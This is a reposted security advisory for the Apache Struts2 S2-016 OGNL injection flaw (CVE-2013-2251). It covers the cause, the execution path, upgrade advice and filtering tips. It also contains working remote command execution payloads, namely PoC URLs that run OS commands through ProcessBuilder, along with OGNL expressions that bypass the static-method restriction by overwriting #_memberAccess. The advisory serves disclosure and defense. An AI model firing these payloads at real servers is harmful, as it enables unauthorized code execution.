Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29766
HistorySep 09, 2013 - 12:00 a.m.

Struts2 Prefixed Parameters OGNL Injection Vulnerability

2013-09-0900:00:00
vulners.com
316

CVE Number: CVE-2013-2251
Title: Struts2 Prefixed Parameters OGNL Injection Vulnerability
Affected Software: Apache Struts v2.0.0 - 2.3.15
Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
Issue Status: v2.3.15.1 was released which fixes this vulnerability
Issue ID by Vender: S2-016

Overview:
Struts2 is an open-source web application framework for Java.
Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which
leads to arbitrary Java method execution on the target server. This is
caused by insecure handling of prefixed special parameters (action:,
redirect: and redirectAction:) in DefaultActionMapper class of Struts2.

Details:
<About DefaultActionMapper>

Struts2's ActionMapper is a mechanism for mapping between incoming HTTP
request and action to be executed on the server. DefaultActionMapper is
a default implementation of ActionMapper. It handles four types of
prefixed parameters: action:, redirect:, redirectAction: and method:.

For example, redirect prefix is used for HTTP redirect.

Normal redirect prefix usage in JSP:
<s:form action="foo">
โ€ฆ
<s:submit value="Register"/>
<s:submit name="redirect:http://www.google.com/&quot; value="Cancel"/>
</s:form>

If the cancel button is clicked, redirection is performed.

Request URI for redirection:
/foo.action?redirect:http://www.google.com/

Resopnse Header:
HTTP/1.1 302 Found
Location: http://www.google.com/

Usage of other prefixed parameters is similar to redirect.
See Struts2 document for details.
https://cwiki.apache.org/confluence/display/WW/ActionMapper

<How the Attack Works>

As stated already, there are four types of prefixed parameters.

action:, redirect:, redirectAction:, method:

All except for method: can be used for attacks. But regarding action:,
it can be used only if wildcard mapping is enabled in configuration.
On the one hand, redirect: and redirectAction: are not constrained by
configuration (thus they are convenient for attackers).

One thing that should be noted is that prefixed parameters are quite
forceful. It means that behavior of application which is not intended
to accept prefixed parameters can also be overwritten by prefixed
parameters added to HTTP request. Therefore all Struts2 applications
that use DefaultActionMapper are vulnerable to the attack.

The injection point is name of prefixed parameters.
Example of attack using redirect: is shown below.

Attack URI:
/bar.action?redirect:http://www.google.com/&#37;25{1000-1}

Response Header:
HTTP/1.1 302 Found
Location: http://www.google.com/999

As you can see, expression (1000-1) is evaluated and the result (999)
is appeared in Location response header. As I shall explain later,
more complex attacks such as OS command execution is possible too.

In DefaultActionMapper, name of prefixed parameter is once stored as
ActionMapping object and is later executed as OGNL expression.
Rough method call flow in execution phase is as the following.

org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()
org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()
org.apache.struts2.dispatcher.Dispatcher.serviceAction()
org.apache.struts2.dispatcher.StrutsResultSupport.execute()
org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()
com.opensymphony.xwork2.util.TextParseUtil.translateVariables()
com.opensymphony.xwork2.util.OgnlTextParser.evaluate()

Proof of Concept:
<PoC URLs>

PoC is already disclosed on vender's web page.
https://struts.apache.org/release/2.3.x/docs/s2-016.html

Below PoC URLs are just quotes from the vender's page.

Simple Expression:
http://host/struts2-blank/example/X.action?action:&#37;25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:&#37;25{3*4}

OS Command Execution:
http://host/struts2-blank/example/X.action?action:&#37;25{&#40;new+java.lang.ProcessBuilder&#40;new+java.lang.String[]{&#39;command&#39;,&#39;goes&#39;,&#39;here&#39;}&#41;&#41;.start&#40;&#41;}
http://host/struts2-showcase/employee/save.action?redirect:&#37;25{&#40;new+java.lang.ProcessBuilder&#40;new+java.lang.String[]{&#39;command&#39;,&#39;goes&#39;,&#39;here&#39;}&#41;&#41;.start&#40;&#41;}
http://host/struts2-showcase/employee/save.action?redirectAction:&#37;25{&#40;new+java.lang.ProcessBuilder&#40;new+java.lang.String[]{&#39;command&#39;,&#39;goes&#39;,&#39;here&#39;}&#41;&#41;.start&#40;&#41;}

Obviously such attacks are not specific to blank/showcase application,
but all Struts2 based applications may be subject to attacks.

<OS Command Execution and Static Method Call>

Another topic that I think worth mentioning is that PoC URLs use
ProcessBuilder class to execute OS commands. The merit of using this
class is that it does not require static method to execute OS commands,
while Runtime class does require it.

As you may know, static method call in OGNL is basically prohibited.
But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by
a simple trick:

%{#_memberAccess['allowStaticMethodAccess']=true,
@java.lang.Runtime@getRuntime().exec('your commands')}

In Struts v2.3.14.2, SecurityMemberAccess class has been changed to
prevent the trick. However there are still some techniques to call
static method in OGNL.

One technique is to use reflection to replace static method call to
instance method call. Another technique is to overwrite #_memberAccess
object itself rather than property of the object:

%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),
@java.lang.Runtime@getRuntime().exec('your commands')}

Probably prevention against static method is just an additional layer
of defense, but I think that global objects such as #_memberAccess
should be protected from rogue update.

Timeline:
2013/06/24 Reported to Struts Security ML
2013/07/17 Vender announced v2.3.15.1
2013/08/10 Disclosure of this advisory

Recommendation:
Immediate upgrade to the latest version is strongly recommended as
active attacks have already been observed. It should be noted that
redirect: and redirectAction: parameters were completely dropped and
do not work in the latest version as stated in the vender's page.
Thus attention for compatibility issues is required for upgrade.

If you cannot upgrade your Struts2 immediately, filtering (by custom
servlet filter, IPS, WAF and so on) can be a mitigation solution for
this vulnerability. Some points about filtering solution are listed
below.

  • Both %{expr} and ${expr} notation can be used for attacks.
  • Parameters both in querystring and in request body can be used.
  • redirect: and redirectAction: can be used not only for Java method
    execution but also for open redirect.

See S2-017 (CVE-2013-2248) for open redirect issue.
https://struts.apache.org/release/2.3.x/docs/s2-017.html

Reference:
https://struts.apache.org/release/2.3.x/docs/s2-016.html
https://cwiki.apache.org/confluence/display/WW/ActionMapper